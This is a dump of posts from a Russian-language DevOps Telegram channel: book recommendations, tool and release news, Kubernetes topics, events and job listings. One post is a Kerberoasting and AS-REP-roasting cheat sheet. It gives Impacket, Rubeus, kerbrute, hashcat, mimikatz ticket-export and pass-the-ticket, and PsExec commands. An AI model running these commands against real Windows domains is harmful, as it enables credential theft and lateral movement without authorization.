4707
Канал о DevOps во всех проявлениях: K8s, CI/CD, AppSec, AI/ML, Cloud, Linux Поможем с DevOps: https://core247.kz/ По рекламе @UlKonovalova
Продолжаем делиться опытом по выходным через книги.
👉 Сегодня это — Паттерны Kubernetes. Эта книга адресована разработчикам, желающим проектировать облачные приложения для платформы Kubernetes. Наибольшую пользу из нее извлекут читатели, которые хотя бы немного знакомы с контейнерами и хотят подняться на новый уровень.
Каждый паттерн проектирования представляет собой описание реальной задачи, а решение поддерживается конкретными примерами кода. Прочитав эту книгу, вы узнаете не только о паттернах Kubernetes, но и о том, зачем они нужны и как их использовать.
Читайте и делитесь с коллегами 🤝
#devops #devopsbooks
@DevOpsKaz
Grafana Tempo — инструмент трассировки с открытым исходным кодом. И на днях состоялся релиз версии 2.3. Рассказываем, что это и почему важно.
🚩 Немного справки: для его работы требуется только объектное хранилище, типа Google Cloud Storage или Amazon S3. Он позволяет принимать, записывать и хранить полные пути чтения наших производственных и тестовых окружений, а также окружений для разработки. Совместим с OpenTelemetry и Opentracing и интегрируется с другими инструментами, вроде Prometheus.
🚩 Что нового в Tempo 2.3:
➖ гораздо более производительные запросы TraceQL
➖ задержка поиска сильно сокращена за счёт новой версии бэкенда
➖ новые структурные операторы: например, для поиска фрагментов HTTP-запросов
➖ функция, которая показывает, какие ошибки или сообщения возникают в вашем кластере
➖ полная поддержка атрибутов OpenTelemetry
🤝 Дальше — еще круче. Делитесь с коллегами!
#devops #grafana #trace #grafanatempo #opentelemetry
@DevOpsKaz
☄️ Шпаргалка по дизайну-системы, у которой более 42 тысяч звёзд на GitHub — это вам не шутки 😉
Она будет интересна всем, кто хоть как-то связан с разработкой ПО. Добавив её в закладки, вы получите огромную библиотеку о таких вещах, как:
➖ протоколы коммуникации
➖ DevOps, CI/CD
➖ архитектурные паттерны
➖ базы данных
➖ кэширование
➖ микросервисы (и монолиты)
➖ платежные системы
➖ облачные сервисы и так далее
Особо хвалят диаграммы.
🚩 Ещё одна приятная новость в том, что она есть и на русском. Пользуйтесь и делитесь с коллегами!
#devops #cheatsheet
@DevOpsKaz
Стратегии развертывания Kubernetes 👆
➖ Повторное создание (Recreate)
Сперва удаление текущей версии приложения, затем развертывание новой версии.
➖ Постепенное развертывание (Rolling)
Все инстансы приложения будут последовательно обновляться до новой версии.
➖ Сине-зеленое развертывание (Blue/Green)
Эта стратегия базируется на двух продуктивных средах: «синяя» — там, где живут старые версии приложения, и «зеленая» — зона, где мы запускаем новую версию приложения.
➖ Канареечное развертывание (Canary)
«Канареечный» деплой схож с зелено-синей стратегией. Часть текущих инстансов приложения заменяется новой версией, на которую переключается часть трафика.
➖ A/B testing
Обычно это стратегия принятия бизнес-решений на основе статистики. Она может быть реализована путем добавления к Canary дополнительной функциональности при определенных условиях. Например, куки браузера, язык или параметры запроса. Вместо того, чтобы открыть доступ к новой функции всем пользователям, ее предлагают лишь ограниченной их части.
➖ Shadow
Теневое развертывание заключается в выпуске версии 1.1 наряду с версией 1.0, перехвате входящих запросов с первой версии и отправке на вторую без влияния на трафик. Это особенно полезно для тестирования production нагрузки на новую функцию.
Каждая стратегия предлагает свой подход к управлению обновлениями.
#devops #kubernetes #k8s
@DevOpsKaz
Infra + K8s: KZ
7 ноября приглашаем DevOps и DevSecOps, архитекторов и разработчиков, специалистов ИБ и SRE-инженеров.
Вас ждут технические доклады, продуктовые обзоры и передовые практики от ведущих разработчиков и экспертов по контейнерным технологиям. Эксперты поделятся кейсами и расскажут, как Kubernetes® помогает решать задачи разработки и бизнеса. Ну и конечно, поговорим про облака и безопасность.
А ещё расскажем о том, как мы создаём и развиваем платформу для эффективной работы внутри Yandex Cloud.
Эксперты из Yandex Cloud, AirAstana, Aviata, Kolesa Group, Rocketdata.
Техноконтент, нетворкинг-сессия и афтерпати, и всё это — в очень атмосферном месте.
Адрес: Hazbin, Алматы, улица Байтурсынова, 141.
Время: с 12:00 до 20:00.
Участие бесплатное, но необходима регистрация.
3 ноября состоится открытая online-встреча CISO EURASIA 2023
Спикеры:
TSARKA, ISACA, Toimrat, Eurasian Digital Foundation, Air Astana, Казминералс, PwC Kazakhstan, Kcell, Комитет Информационной Безопасности МЦРИАП РК и др.
Ключевые темы:
➖ Обеспечение киберустойчивости в регионе: рабочие стратегии;
➖ Взгляд в будущее: глобальные тренды промышленной кибербезопасности;
➖ Практика: опыт разработки стратегии ИБ и киберзащиты производственной инфраструктуры;
➖ Мошенники идут в ногу со временем: как развивать механизмы антифрода;
➖ Персональные данные: диалог с регулятором;
➖ В тренде: развитие нейросетей и риски, связанные с ИИ;
➖ Дискуссионный клуб: роль CISO в общей и цифровой стратегии компании;
➖ ИБ компетенции: какие навыки востребованы для ИБ руководителей и их команд;
➖ Инициативы по повышению осведомленности, проблемы при разработке и внедрении AWARENESS программ.
☄️ Список бесплатных курсов и сертификаций от Cloud Study Network — глобального технологического сообщества, которое делится знаниями.
В их репозитории собраны ссылки от различных вендоров. Среди них: Gitlab, Oracle, Azure, Microsoft, Google, Elastic и множество других.
_____________________
Если хотите учиться на русском, рассмотрите курсы от Слёрм — по Kubernetes, DevOps, SRE, Безопасности, Работе с данными, IaC и другим скиллам. Граждане Казахстана могут купить их в рассрочку от Kaspi либо по региональной скидке от 10%.
Условия только для наших подписчиков 🫡
Пользуйтесь и делитесь с коллегами 🤝
#devops #k8s #kubernetes #iac #sre #learning
@DevOpsKaz
☄️ Шпаргалка по Cloud Network Components
Эта шпаргалка предлагает краткую сводку по ключевым сетевым элементам основных поставщиков облачных услуг.
Сетевые компоненты — основа облачной инфраструктуры, которая гарантирует подключение, масштабируемость и функциональность облачных сервисов.
Это маршрутизаторы, подсистемы балансировки нагрузки и брандмауэры. Они обеспечивают безопасный обмен данными между серверами и клиентами. А CDN оптимизируют доставку контента, кэшируя данные на периферии, уменьшая задержки и улучшая взаимодействие с пользователем.
Все сетевые элементы работают вместе, чтобы создать надежную и быстро реагирующую облачную экосистему.
👉 Расскажите в комментариях, какие у вас были сложности настройки и управления этими сетевыми компонентами? Возможно, кто-то другой их уже проходил и может подсказать вам 😉
#devops #cloud
@DevOpsKaz
☄️ Релиз GitLab 16.5
В новую версию вошли апдейты с отчетами о соблюдении стандартов, правилами целевых веток мерж-реквестов, разрешимыми потоками проблем, ускоренными процессами слияния и другим. Всего — более 25 улучшений.
Помимо улучшений появилось и кое-что новое. Например,
виджет связанных элементов в задачах, целях и ключевых результатах. Или настраиваемая политика заблокированных пользователей.
Познакомьтесь с релизом здесь и поделитесь с коллегами 🤝
#devops #gitlab #gitlab165
@DevOpsKaz
Продолжаем делиться опытом по выходным через книги.
👉 Сегодня это — книга Чистый код Роберта Мартина.
Даже плохой программный код может работать. Однако если код не является «чистым», это всегда будет мешать развитию проекта и компании-разработчика, отнимая значительные ресурсы на его поддержку и «укрощение».
Эта книга посвящена хорошему программированию. Она полна реальных примеров кода и рассматривает код с различных направлений: сверху вниз, снизу вверх и даже изнутри. Вы научитесь отличать хороший код от плохого и узнаете, как писать хороший код и как преобразовать плохой код в хороший.
Читайте и делитесь с коллегами 🤝
#devops #devopsbooks
Kubectl — это утилита командной строки в Kubernetes для запуска команд в кластерах. Помогает развертывать приложения и микросервисы, просматривать ресурсы и управлять ими, проверять файлы журналов и другое.
С помощью плагина OpenAI утилита может генерировать манифесты Kubernetes — это помогает избегать поиска и сбора случайных манифестов при разработке/тестировании.
Способна интегрироваться с внешними редакторами, такими как vscode или vim.
Поиграйтесь с ней, чтобы определить, где она может быть полезна для вас — и делитесь с коллегами 🤝
#kubernetes #kubectl #k8s #openai #devops
@DevOpsKaz
В Kubernetes довольно сложно найти то, что висит мертвым грузом и не используется, ввиду большого количество resources в кластере. Помочь в этом может фича Kor.
Kor — это инструмент для обнаружения неиспользуемых ресурсов Kubernetes. Вот что он может найти и показать:
➖ ConfigMaps
➖ Secrets
➖ Services, ServiceAccounts
➖ Deployments
➖ StatefulSets
➖ Roles
➖ HPAs, PVCs
➖ Ingresses
➖ PDBs
Пользуйтесь и делитесь с коллегами 🤝
#k8s #kubernetes #devops
@DevOpsKaz
Продолжаем делиться опытом через книги.
👉 Сегодня это — Проект «Феникс». Роман о том, как DevOps меняет бизнес к лучшему.
Не столько роман, сколько сборник фундаментальных DevOps-решений через призму кейсов из реальной жизни. Когда мы начинаем свой путь в профессии начинает работать правило: один раз — случайность, второй раз — совпадение, а третий — уже система.
Книга помогает заново взглянуть на процессы поставки в разработке, выявить узкие места, увидеть объемы рутинных задач, защитить плановые работы от завала незапланированных «пожаров».
Читайте и делитесь с коллегами 🤝
#devops #devopsbook
@DevOpsKaz
3 ноября в Алматы в отеле DoubleTree by Hilton впервые пройдёт МЕЖОТРАСЛЕВОЙ ФОРУМ ДИРЕКТОРОВ ПО ИБ CISO EURASIA 2023.
📌250+ представителей ИБ комьюнити из разных отраслей от финтеха до нефтянки;
📌15+ тематических сессий, 2 трека;
📌40+ экспертных докладчиков;
🔥УЧАСТИЕ ДЛЯ CISO и ИБ СПЕЦИАЛИСТОВ БЕСПЛАТНОЕ!🔥
В программе:➖Интенсивное погружение: стратегия, практики, решения;
Уже завтра в Астане откроется международный форум Digital Bridge 2023, посвященный теме ARTIFICIAL AND HUMAN INTELLIGENCE: THE RIGHT BALANCE
Обсуждать будут и много смежных вопросов, причём сферу Big Data затронут сразу на трёх панельных сессиях, одну из которых на тему «Data-Driven организации: данные как актив» проведет Даурен Керейбаев, директор по изменению процессов АО «Казахтелеком».
👉 Программа форума и регистрация
Среди спикеров сессии представители таких банков как Народный, Forte и Bereke, а также ERG и ассоциации Dama-Kazakhstan.
По словам господина Керейбаева, одним из ключевых вопросов для участников сессии будет возможность монетизации Big Data в казахстанских условиях, что должно представлять большой интерес для собственников бизнеса и топ-менеджеров.
Панельная сессия «Data-Driven организации: данные как актив» откроется на форуме Digital Bridge 13 октября в 13:00.
Перед участием в сессии можно пройти небольшой опрос по поводу помех для внедрения data-driven — подхода в казахстанских компаниях по ссылке
Это база: нюансы работы с Redis. Часть 1
Cерия статей про неочевидные нюансы работы с Redis.
В первой части Петр, DevOps-инженер компании Nixys, подробно рассказал об основных концепциях и понятиях этой БД и подготовил чек-лист, который может помочь вам в оптимизации этого NoSQL решения.
Приятного чтения!
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.
➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec
➡️ ASREP-Roast
➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"ㅤ
python2 GetNPUsers.py <Domain> -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"ㅤ
.\Rubeus.exe asreproastㅤ
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt
john --wordlist rockyou.txt Hashes.txt --format=krb5tgsㅤ
hashcat -m 18200 -a 3 Hashes.txt rockyou
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>ㅤ
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>ㅤ
.\Rubeus.exe brute /passwords:<Wordlist>ㅤ
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -requestㅤ
.\Rubeus kerberoastㅤ
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=localㅤ
.\Rubeus.exe kerberoast /user:File_SVCㅤ
sekurlsa::tickets /export
kerberos::ptt <.kirbi file>
misc::cmdㅤ
.\Rubeus.exe dump
.\Rubeus.exe ptt /ticket:<.kirbi file>ㅤ
.\PsExec.exe -accepteula \\<IP> cmdㅤ
🗣Внимание, конкурс!
Разыгрываем 7 ваучеров на бесплатное обучение и сертификацию от Cloud Native Computing Foundation. Ваучеры дают 100% скидку на курс или экзамен по Kubernetes из списка ниже до 23 февраля — и мы хотим ими поделиться:
🟣 CKA certification exam
🟣 CKAD certification exam
🟣 CKS certification exam
🟣 Обучение LFS258 Kubernetes Fundamentals
🟣 Обучение LFS260 Kubernetes Security Essentials
🟣 Обучение LFD259 Kubernetes для разработчиков
🟣 Пакет LFS258+CKA (обучение + экзамен)
🟣 Пакет LFD259+CKAD (обучение + экзамен)
🟣 Пакет LFS260+CKS (обучение + экзамен)
Мы хотим, чтобы сообщество DevOps развивалось, поэтому условия розыгрыша просты.
🔵 Подпишитесь на наш ТГ-канал и оставьте комментарий с профилем коллеги (@username) из DevOps и смежных сфер под этим постом.
🥳 13 ноября подведем итоги и выберем 7 победителей методом генерации случайных чисел. Каждый получит по ваучеру. Go-go-go, и успехов!
#kubernetes #cka #ckad #cks #k8s #linuxfoundation #cncf
@DevOpsKaz
Маск критиковал затраты и сложность бывшего Twitter, а ныне платформы X. Это не всегда было красиво, но определенно эффективно. Сайт не только работает, несмотря на кадровые изменения, но и все больше экспериментирует.
Например, он сделал #CloudExit ключевым компонентом программы экономии средств. Вот что говорят об этом его инженеры:
«Сократили затраты на облачных поставщиков и многое вернули на локальную базу. Перенесли все media/blob artifacts из облако и сократили его объем на 60%. Так мы уменьшили ежемесячные расходы на облако на 60%, а затраты на обработку облачных данных на 75%»
А в рамках проекта Х их затраты — это 100 миллионов долларов в год на AWS. Просто вышли из облака и сделали это командой, которая вчетверо меньше той, что была раньше. Иногда и такие меры работают!
#devops #cloud
☄️ RecoverPy — мощный инструмент, который использует возможности вашей системы для восстановления удаленных файлов. Полезно, если вы как и мы иногда чистите те же загрузки, а потом вспоминаете, что там было кое-что важное.
В отличие от других программ, вы можете не только восстанавливать удаленные файлы, но и перезаписывать данные.
Нужен только Linux и права root.
☄️ Релиз Grafana 10.2
Grafana — система визуализации данных, ориентированная на данные систем ИТ-мониторинга. Новая версия Grafana содержит улучшения по части дашбордов и визуализации данных. Теперь дашборды по-настоящему дашборды и интерактивные!
Появились кнопки визуализации на панелях, автоматически сгенерированные заголовки и описания панелей.
В Grafana Enterprise также добавили новые инструменты, которые помогут лучше управлять разрешениями учетных записей пользователей и служб.
Есть и улучшения, которые оптимизируют процессы оповещения, улучшают навигацию по результатам трассировки.
👉 Полный список изменений можно узнать здесь
#devops #grafana
@DevOpsKaz
☄️ Набор рекомендаций по безопасности развертывания Kubernetes.
Цель этого seifeddinerajhi/kubernetes-security-assessment-guidelines-and-necessary-checklist-9a326f341b68">контрольного списка — систематизировать подход к безопасности кластера Kubernetes и обеспечить выполнение всех необходимых шагов для защиты кластера от потенциальных угроз.
Короче говоря, он предоставляет организациям отправную точку для оценки безопасности своего развертывания Kubernetes и внесения любых необходимых изменений для полной защиты.
Рекомендации списка разбиты по категориям:
➖ Аутентификация и авторизация
➖ Секреты
➖ Безопасность конфигурации кластера
➖ Аудит и регистрация
➖ Безопасная конфигурация ОС
➖ Сетевая безопасность
➖ Безопасная настройка рабочих нагрузок
➖ Безопасная сборка образа
Следуйте рекомендациям и вы предпримете наиболее важные шаги для усиления защиты сред Kubernetes 🫡
#devops #devsecops #kubernetes
@DevOpsKaz
☄️ Основные инструменты API на 2023 год по категориям.
💼 Развертывание и управление:
— API {REST} и FakeRest для развертывания
— Apigee, MuleSoft Anypoint, IBM API Connect для управления
🧪 Тестирование:
— APACHE JMeter и JMeter™ для нагрузочного тестирования
— SoapUI для функциональных тестов
— Rest-Assured для макетов и тестов
🔄 Генерация кода:
— Swagger и RAML Codegen
🔐 Безопасность:
— От общих инструментов, вроде Postman, до нишевых OWASP, ZAP И API Fortress
— Autho, Okta и Keycloak прикроют при авторизации
📊 Контроль:
— Боги мониторинга New Relic, Datadog и AppDynamics
🛡 Защита:
— Cloudflare, AWS WAF и Брандмауэр Azure для надежной защиты
🔍 Дизайн и разработка:
— Swagger (OpenAPI) для спецификаций
— RAML, PAML & API Blueprint для языков
— Postman за изящный дизайн и тестирование
— Mockoon для макетных серверов
#devops #api #aws #azure #cloudflare #apache #swagger
☄️ Подборка вакансий на выходные
➖ Senior DevOps Engineer, Naviteq, От 6 000 до 7 000$, Астана
➖ Junior DevOps Engineer, Axenix (ранее Accenture), По договоренности, Алматы
➖ DevOps инженер (Middle/Senior), Hard Code, От 350 000 до 900 000 ₸, Астана
➖ Senior DevOps Engineer (Remote), АСД Технолоджиз, От 3 500 до 4 000$, Алматы
➖ Senior SRE инженер (Системный администратор), Сан Коннект, От 1 000 000 до 1 500 000 ₸, Алматы
➖ SysOps/Infrastructure Engineer, G5EN KAZ, По договоренности, Астана
➖ SysOps/Infrastructure Engineer, G5EN KAZ, По договоренности, Алматы
➖ Руководитель отдела разработки и поддержки, «FREEDOM TELECOM», По договоренности, Алматы
#devops #DevOpsИнженер #sre #cv
@DevOpsKaz
☄️ Как устроен дизайн системы Facebook
➖ Взаимодействие с клиентом. Пользователи получают доступ к Facebook через мобильные или веб-приложения.
➖ Балансировщик нагрузки. Равномерно распределяет запросы к шлюзам API и управляет событиями для серверов приложений чтения и записи.
➖ Шлюзы API. Прямые запросы к микросервисам.
➖ Запись данных. Шлюзы API направляют операции записи (например, загрузки, комментарии) на сервер приложений, который проверяет запросы, записывает данные и обрабатывает видео.
➖ Генерация ленты. Сервис генерирует и обновляет каналы пользователей.
➖ Чтение данных. Шлюзы API направляют операции чтения (например, просмотр каналов, профилей) в соответствующие службы.
➖ База метаданных. Хранит профили пользователей и данные о публикациях.
➖ Механизм кэширования. Использует Redis или Memcached для кэширования данных, уменьшая задержку и нагрузку на базу данных.
➖ Поисковый сервис (Elasticsearch). Эффективно выполняет поиск пользователей и контента.
➖ Хранилище BLOB-объектов. Хранит загруженные пользователем мультимедиа (изображения, видео).
➖ CDN (сеть доставки контента). Кэширует и обслуживает статический контент с низкой задержкой.
➖ Обработка видео. Управляет обработкой загруженного пользователем видео, включая перекодирование, изменение размера и миниатюры.
➖ Уведомления. Уведомляет пользователей о лайках, комментариях и взаимодействиях.
Архитектура Facebook также включает дополнительные сервисы для мониторинга, аналитики, резервного копирования, восстановления, рекомендательных систем, масштабируемости, оптимизации производительности и надежности.
#devops #facebook
@DevOpsKaz
Это не просто красивые значки. А пруф, подтверждающий ваши навыки, авторитет, доверие и знание технологий и инструментов разработки.
Программа сертификации будет доступна в начале 2024 года, но уже 8–9 ноября на GitHub Universe можно сдать экзамен и стать одним из первых, кто пройдет сертификацию.
Есть четыре направления:
- GitHub Foundations
- GitHub Actions
- GitHub Advanced Security
- GitHub Administration
Для каждого есть обучающий путь, доступный online — от 20 минут до 1,5 часов. А если хочется больше, то можно скачать Study Guide.
Прокачивайтесь, сертифицируйтесь и делитесь с коллегами 🤝
#devops #github
@DevOpsKaz
Объединение Agile и DevOps
Для любого, кто находится на пути к Agile-DevOps, речь идет о кастомизации, совместной работе и постоянном совершенствовании.
Это базовое руководство. Крайне важно адаптировать инструменты и методологии в соответствии с потребностями вашей команды и целями организации.
🔄 𝗔𝗴𝗶𝗹𝗲 𝗗𝗲𝘃𝗲𝗹𝗼𝗽𝗺𝗲𝗻𝘁:
— Начните работу по созданию пользовательских историй с Product Owner.
— Проводите опросы пользователей на соответствие этапов разработки продукта их пожеланиям.
— Используйте бэклоги для планирования и поставки конечного продукта в спринтах.
⚙️ 𝗖𝗼𝗻𝘁𝗶𝗻𝘂𝗼𝘂𝘀 𝗜𝗻𝘁𝗲𝗴𝗿𝗮𝘁𝗶𝗼𝗻:
— Пишите коммиты, затем создавайте, тестируйте и поддерживайте качество кода.
— Используйте инструменты, как GitHub / Bitbucket, для репозиториев кода, интегрируясь с такими платформами, как Jira / Rally.
— Используйте серверы CI для оптимизации операций, отслеживая показатели качества кода в режиме реального времени.
🔄 𝗔𝗴𝗶𝗹𝗲 𝗗𝗲𝘃𝗢𝗽𝘀 𝗖𝘆𝗰𝗹𝗲:
— Придерживайтесь процедур Scrum, обзоров спринтов и непрерывного тестирования.
— Поддерживайте прозрачность, используя такие инструменты, как Slack / Teams.
— Не игнорируйте раннее обнаружение ошибок, поддержку частых выпусков и постоянные циклы обратной связи.
🚀 𝗖𝗼𝗻𝘁𝗶𝗻𝘂𝗼𝘂𝘀 𝗗𝗲𝗹𝗶𝘃𝗲𝗿𝘆 & 𝗙𝗲𝗲𝗱𝗯𝗮𝗰𝗸:
— Используйте такие инструменты, как SonarQube, для статического анализа кода, запуска сборок и обратной связи.
— Внедряйте модульные тесты с помощью JaCoCo и JUnit, ориентируясь на 100% успешное выполнение и не менее 80% охвата кода.
— Используйте Jenkins и Maven для сборки и развертывания, сводя к минимуму дефекты и уязвимости.
💡 𝗤𝘂𝗮𝗹𝗶𝘁𝘆 𝗔𝘀𝘀𝘂𝗿𝗮𝗻𝗰𝗲 & 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆:
— Используйте такие инструменты, как Selenium, для регрессионных тестов и UAT-тестов.
— Повысьте безопасность с помощью регулярного сканирования Qualys.
— Управляйте инфраструктурой с помощью Terraform и Ansible.
Адаптируйтесь и наблюдайте, как трансформируется жизненный цикл разработки! И делитесь с коллегами 🤝
@DevOpsKaz
DbAutoDoc — это репозиторий, который помогает создавать документацию по базе данных. Для этого используется официальный Docker-образ SchemeSpy.
Вот пример результата.
Готовая документация легко загружается на GitHub.
Это контент от нашего подписчика — разработчика из Алматы, Нуржана Айтбаева. Не забывайте делиться своими наработками, новостями или другим контентом 🤝
@DevOpsKaz
📌 Ansible — это набор инструментов с открытым исходным кодом. Он нужен для управления конфигурацией, развертывания приложений, непрерывной доставки и автоматизации инфраструктуры.
👉 На GitHub члены сообщества собрали:
➖ учебники и книги для изучения Ansible
➖ видеоуроки и курсы
➖ инструменты, которые помогут использовать Ansible максимально эффективно
➖ лучшие практики и другое (есть даже интеграция с текстовыми редакторами и IDE)
Зачем это все, ведь можно разобраться самостоятельно? Вот пара причин:
*️⃣ Поиск и устранение ошибок в сценариях может быть сложным
*️⃣ При работе с большими инфраструктурами необходимо уделять внимание масштабируемости и производительности
*️⃣ Вы должны знать, какие модули использовать и как правильно их настраивать
В подборке вы найдете инструменты, которые помогут с этим. Пользуйтесь и делитесь с коллегами 🤝
@DevOpsKaz
Kolesa Conf'23: только полезное для IT-рынка Казахстана
7 октября прошла ежегодная IT-конференция Kolesa Conf, которая объединяет и развивает IT-сообщество Казахстана. Где разработчики, менеджеры, аналитики, QA и другие представители IT-сообщества Казахстана и СНГ делятся знаниями.
За один день прошли четыре потока по IT-направлениям: Management, Web, Datа и Mobile. Конференцию офлайн посетило свыше 900 человек, онлайн смотрели тысячи зрителей.
Руководитель отдела обучения и развития Kolesa Group Кристина Абдраимова была одним из организаторов:
«Мы уже пятый год подряд проводим Kolesa Conf — самую масштабную IT-конференцию в Казахстане. В этом году она вышла на новый уровень - впервые прошла на двух языках: русском и казахском.
Наша площадка объединяет представителей разных IT-компаний и даёт уникальную возможность для обмена знаниями и опытом. Уверена, что каждый участник благодаря нашей конференции привнесёт что-то новое и полезное в свои проекты, и крутых IT-продуктов в Казахстане будет ещё больше».
Записи докладов будут готовы в течение месяца на ютуб-канале Kolesa Group 🫡